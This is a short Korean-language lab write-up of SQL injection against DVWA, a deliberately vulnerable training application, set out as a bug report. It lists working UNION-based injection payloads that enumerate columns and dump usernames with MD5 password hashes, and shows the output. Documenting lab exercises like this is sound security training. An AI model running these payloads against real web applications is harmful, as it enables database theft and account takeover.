DVWA SQL Injection

DVWA SQL Injection low

[그림 1]

Summary
[그림1] 는 SQLInjection 공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다

Description
[그림 1] 은 ' , # , -- ,= 등 SQLInjection 에 취약한 특수문자등을 필터링하지 않아 SQL주입이 가능합니다.

Steps to reproduce

ORDER BY Query
1' order by 1,2#

User ID:  

ID: 1' ORDER BY 1,2#
First name: admin
Surname: admin
UNION Query

' UNION SELECT 1,@@version# 

User ID:  

ID: 1' UNION SELECT 1,version()#
First name: admin
Surname: admin
ID: 1' UNION SELECT 1,version()#
First name: 1
Surname: 10.4.8-MariaDB
' UNION ALL SELECT 1,column_name from information_schema.columns#


User ID:  

ID: ' UNION ALL SELECT 1,column_name from information_schema.columns#
First name: 1
Surname: user_id
ID: ' UNION ALL SELECT 1,column_name from information_schema.columns#
First name: 1
Surname: first_name
ID: ' UNION ALL SELECT 1,column_name from information_schema.columns#
First name: 1
Surname: last_name
ID: ' UNION ALL SELECT 1,column_name from information_schema.columns#
First name: 1
Surname: user
ID: ' UNION ALL SELECT 1,column_name from information_schema.columns#
First name: 1
Surname: password
' UNION ALL SELECT user,password from users#


User ID:  

ID: ' UNION ALL SELECT user,password from users#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: ' UNION ALL SELECT user,password from users#
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: ' UNION ALL SELECT user,password from users#
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' UNION ALL SELECT user,password from users#
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' UNION ALL SELECT user,password from users#
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99


Impact

Dabase 및 관리자 계정 탈취가 가능합니다.